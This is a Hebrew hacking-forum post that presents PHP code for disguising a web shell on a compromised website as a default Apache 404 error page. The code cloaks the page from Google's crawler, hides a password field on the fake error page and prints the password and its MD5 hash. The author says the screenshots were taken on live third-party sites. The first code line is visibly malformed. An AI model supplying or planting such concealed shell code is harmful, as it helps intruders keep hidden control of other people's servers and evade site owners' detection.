נושא קטן אשר התחיל לצוץ לא פעם ולא פעמיים בקהילות למיניהן וסקרן אותי אישית לא מעט. נגיד שהצלחתם לדחוף שאלל לאתר, מה ימנע מבעל האתר לעלות עליו, למחוק אותו, לתקן את הפריצה ובום טראח? לא הרבה. אולי סיסמא מוצפנת בכניסת השאלל, אבל גם זה נראה מחשיד ביותר ולא מי-יודע-מה קשה לניתוח מצד מתכנת / בעל האתר.
פתרון אפשרי: הסוואת השאלל בתור שגיאת דף.
אנימציית GIF:
(לא שלי, תמונת הGIF נמצאה באינטרנט ללא מקור ברור & האתר כבר מת מזמן)
כפי שאתם רואים, המראה של השגיאה זהה אחד לאחד לשגיאת 404 אמיתית של האתר (נוסח ברירת מחדל של הקנפוג), במבט חטוף לא ניתן להבדיל בכלל, כלומר, אם לא תדע מלכתחילה שיש שמה משהו, אתה לא תמצא כלום. ניתן לקחת את הרעיון אפילו רחוק יותר עם הגדרת הcURL ושימושה כזיהוי שגיאת ה404 אוטומטית באתר וחיקוי המציאה, אבל כרגע אשאר בבסיס. אחרי שמציבים את השגיאה המזויפת, מסדרים שדה (גם, בלתי נראה ממבט ראשון) קלט מסוג סיסמא, שבו מכניסים את הסיסמא המוגדרת בשאלל, רק אם הצלחת לשים את הסיסמא הנכונה אתה תיכנס לשאלל. לדעתי, זה לא פחות מסוג חדש וחכם ביותר של PHP SHELL.
אבל למה להשאיר אותכם במילים? ניתן לקוד לדבר.
<?
"auth_pass = "f105d2e7e230814257820eada783f9cd";
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
function printLogin() {
?>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
?>
הקוד לא במקור שלי, אלא של Zer0Pwn, עם כמה עריכות לא קטנות שלי. (ביטול אינדקסים של גוגל, ועוד שטויות כגון סיישן)
מחרוזת הMD5:
RAINBOW
באותיות גדולות.
הבולאן בהתחלה מונע מגוגל 'לאנדקס' (להוסיף למאגר תוצאות החיפוש שלהם) את הדף, מה שיכול להיות מגוחך ביותר במקרה של ההאקר והשאלל שלו.
הבהרה: הסקריפט עצמו לא מהווה 'כלי פריצה' בשום דרך הגיונית, אלא רק קוד PHP+HTML.
תמונות להמחשת תיאור -
לפני הלוגין:
http://www.fastup.co.il/images/63936048.jpg
אחרי הלוגין, כניסה לשאלל:
http://www.fastup.co.il/images/76106018.jpg
(אלפי סליחות על השימוש באתרים חיים על מנת לצלם את התרחישים, לצערי אני על מחשב נייד חלש ביותר אשר לא יכול לתפעל פה שרת בסגנון WAMP, מיותר לציין כי שום נזק לא נגרם לאתרים הנ"ל, גם בגלל זה צנזרתי כל חלק אפשר אשר עלול לספק מידע רגיש אודות השרתים.)
אז מה היא דעתכם על הרעיון? חכם / נדוש? מוזמנים להפוך את האשכול לדיון פורה
כל מידע המופיע באשכול הנ"ל נכתב ממטרות למידה בלבד למטרות למידה בלבד, האשכול בשום פנים ואופן לא מתיימר להוות אשכול פוגע / 'בלאק האט' / לא חוקי וכדומה. כל שימוש לא חוקי בסקריפט הPHP ו/או במידע אשר מופיע באשכול זה מתחיל ונגמר באחריותכם בלבד, ואני לא לוקח שום אחריות על מעשיכם.
404 Shell
ציטוט ההודעה
נכתב במקור על ידי OriGranot
